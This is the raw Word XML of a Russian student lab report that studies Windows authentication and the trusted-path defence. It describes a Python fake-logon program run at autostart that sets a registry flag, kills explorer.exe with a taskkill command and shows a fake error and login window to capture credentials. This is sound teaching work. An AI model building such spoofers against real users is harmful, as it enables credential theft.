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0"/>
        </w:numPr>
        <w:suppressAutoHyphens w:val="true"/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образования и науки Российской Федерации</w:t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—</w:t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компьютерных наук и кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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hanging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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressAutoHyphens w:val="true"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="62"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="62"/>
        </w:rPr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hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Механизм аутентификации пользователей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»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hanging="0" w:left="0"/>
        <w:contextualSpacing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«Основы информационной безопасности»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0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Выполнил</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="3960" w:leader="none"/>
          <w:tab w:val="left" w:pos="6840" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>студент гр. 5151001/40001</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Волошкевич М.А.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="3960" w:leader="none"/>
          <w:tab w:val="left" w:pos="6840" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="567"/>
        <w:contextualSpacing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                        </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="4746" w:leader="none"/>
          <w:tab w:val="left" w:pos="6840" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:hanging="0"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ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="200"/>
        <w:ind w:hanging="0" w:left="567"/>
        <w:contextualSpacing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0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="200"/>
        <w:ind w:hanging="0" w:left="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Преподаватель                                                                 Орёл Е.М.</w:t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pacing w:lineRule="auto" w:line="240" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="567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40"/>
        <w:ind w:firstLine="851"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ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="4746" w:leader="none"/>
          <w:tab w:val="left" w:pos="6840" w:leader="none"/>
        </w:tabs>
        <w:suppressAutoHyphens w:val="true"/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uppressAutoHyphens w:val="true"/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uppressAutoHyphens w:val="true"/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uppressAutoHyphens w:val="true"/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spacing w:lineRule="auto" w:line="240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hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk195516256"/>
      <w:r>
        <w:rPr/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Получение навыков защиты информационных систем путем проверки подлинности пользователей, исследование проблемы подмены механизма аутентификации в операционной системе Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Постановка задач</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style25"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Подготовить виртуальную машину для тестирования программы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style25"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Разработать программу, имитирующую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-диалог в операционной системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style25"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Проверить работоспособность программы при включённом и выключенным механизмом доверенного пути </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Теоретические исследования</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>В современных защищенных системах каждый пользователь должен быть зарегистрирован как уникальная системная сущность. Для начала рабочего сеанса пользователь обязан подтвердить свою идентичность, введя учетные данные (логин и пароль). Этот процесс включает два ключевых этапа:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Идентификация</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — присвоение субъектам и объектам системы уникальных идентификаторов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Аутентификация</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — проверка соответствия заявленной идентичности, то есть подтверждение того, что пользователь действительно является тем, за кого себя выдает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="999"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Проблемы безопасности при аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Несмотря на кажущуюся простоту, процесс аутентификации связан с рядом угроз безопасности. Основные проблемы включают:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Угадывание пароля</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Полный перебор</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — наиболее эффективный метод, при котором злоумышленник пытается подобрать пароль путем перебора всех возможных комбинаций. Хотя этот метод требует значительного времени, он может быть успешным при использовании слабых паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Интеллектуальный поиск</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — оптимизация полного перебора за счет использования начальной информации о пользователе (например, дата рождения, имя и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Способы противодействия</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Регулярное изменение пароля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Увеличение длины и сложности пароля (использование цифр, букв разных регистров, специальных символов).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ограничение числа попыток ввода пароля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование утилит для проверки и генерации стойких паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Компрометация файла паролей</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Пароли пользователей хранятся в системных файлах. Если злоумышленник получает доступ к этим файлам, он может узнать пароли всех пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Способы противодействия</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование хэш-функций для хранения паролей. Хэш-функции преобразуют пароль в уникальное значение, которое невозможно обратно преобразовать в исходный пароль.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Контроль доступа к файлам паролей.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование криптографических методов, таких как добавление "соли" (случайной строки) к хэш-функции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Подмена подсистемы идентификации/аутентификации</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Злоумышленник может внедрить программу ложного логина (fake login), которая имитирует процесс входа в систему. Пользователь вводит свои учетные данные, которые затем сохраняются злоумышленником.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Способы противодействия</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Использование механизма "Доверенного пути" (trusted path), при котором система подтверждает свою подлинность перед пользователем.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Взаимная аутентификация, при которой система также подтверждает свою идентичность пользователю.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="999"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Механизм доверенного пути в Windows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="708"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">В операционной системе Windows процесс аутентификации пользователей осуществляется через системный процесс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WinLogon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, который имеет собственный рабочий стол аутентификации. Этот рабочий стол недоступен для других процессов, что предотвращает возможность подмены интерфейса входа в систему.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="708"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">После запуска системы на экран выводится начальное окно рабочего стола аутентификации, содержащее указание нажать комбинацию клавиш </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ctrl+Alt+Del</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Это действие активирует механизм доверенного пути, так как сообщение о нажатии этих клавиш передается только процессу WinLogon. После этого система переключается на регистрационное окно, где пользователь вводит свои учетные данные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0" w:left="999"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Угрозы, связанные с имитацией интерфейса входа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:firstLine="708"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Злоумышленник может попытаться воспроизвести регистрационное окно аутентификации, чтобы перехватить учетные данные пользователя. Однако система Windows автоматически заменяет регистрационное окно на начальное, если пользователь не предпринимает попыток входа в течение определенного времени. Это снижает вероятность успешной атаки с использованием программ-имитаторов.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Heading1"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk195516256"/>
      <w:r>
        <w:rPr/>
        <w:t>Описание решения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Подготовка виртуальной машины</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="true"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Для проведения эксперимента была развернута виртуальная среда на базе Oracle VirtualBox с операционной системой Windows 10. Конфигурация системы соответствовала стандартным настройкам по умолчанию, за исключением модификации параметра групповой политики:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Интерактивный вход в систему: не отображать учетные данные последнего пользователя»</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (Local Security Policy → Security Options) был переведен в состояние </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>«Включен»</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref192604802 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6101080" cy="43719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8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bookmarkStart w:id="2" w:name="_Ref192604793"/>
      <w:bookmarkStart w:id="3" w:name="_Ref192604802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3"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> - Изменение локальной политики</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Разработка программы-имитатора </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Была разработана программа-имитатор на языке Python, имитирующая интерфейс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-окна Windows (полный исходный код представлен в </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194422467 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). Для обеспечения автоматического выполнения программа была интегрирована в автозагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="851" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Тестирование программы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>При старте системы программа выполняет следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Создает параметр «switch» в реестре (HKEY_CURRENT_USER\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Variables</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) со значением 0, что указывает на начало сеанса перехвата данных. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(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_Ref194421917 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Принудительно завершает процесс explorer.exe через системный вызов taskkill /f /im explorer.exe, блокируя доступ к графической оболочке Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Отображает сообщение об ошибке с указанием мнимой причины сбоя (</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> REF _Ref194421063 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Рисунок 3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/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3926840" cy="2690495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4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bookmarkStart w:id="4" w:name="_Ref194421901"/>
      <w:bookmarkStart w:id="5" w:name="_Ref194421917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bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>переменная "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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604895" cy="2630805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6800" t="29916" r="25614" b="19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9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bookmarkStart w:id="6" w:name="_Ref194421063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bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> - Ошибка при запуске ОС</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>После закрытия сообщения пользователем программа активирует фиктивное окно входа в систему (</w:t>
